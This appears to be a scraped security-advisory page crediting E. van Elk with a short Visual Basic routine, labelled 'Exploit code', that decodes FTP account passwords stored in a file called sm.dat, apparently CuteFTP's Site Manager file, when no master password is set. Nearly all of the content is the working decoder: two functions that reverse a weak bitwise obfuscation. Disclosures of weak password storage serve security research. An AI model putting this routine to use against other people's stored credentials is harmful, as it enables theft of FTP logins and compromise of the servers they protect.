|
Brought to you by:
Suppliers of:
|
|
|
| |
Credit:
The tool has been provided by E. van Elk.
For more information, see: http://www.eve-software.com/security/.
|
| |
This piece of VB code will decode the passwords stored in sm.dat for the FTP accounts .
This works only if you did not set a password on the Site Manager!
Exploit code:
'Decode a single character
Public Function CuteDecode(i_Asc As Integer)
CuteDecode = ((Not i_Asc) And 200) + (i_Asc And 55)
End Function
'Decode password
Public Function CuteDecodeString(str_password As String)
Dim i As Integer
CuteDecodeString = ""
For i = 1 To Len(str_password)
CuteDecodeString = CuteDecodeString + Chr$(CuteDecode(Asc(Mid(str_password, i, 1))))
Next i
End Function
|
|
blog comments powered by
|
|
|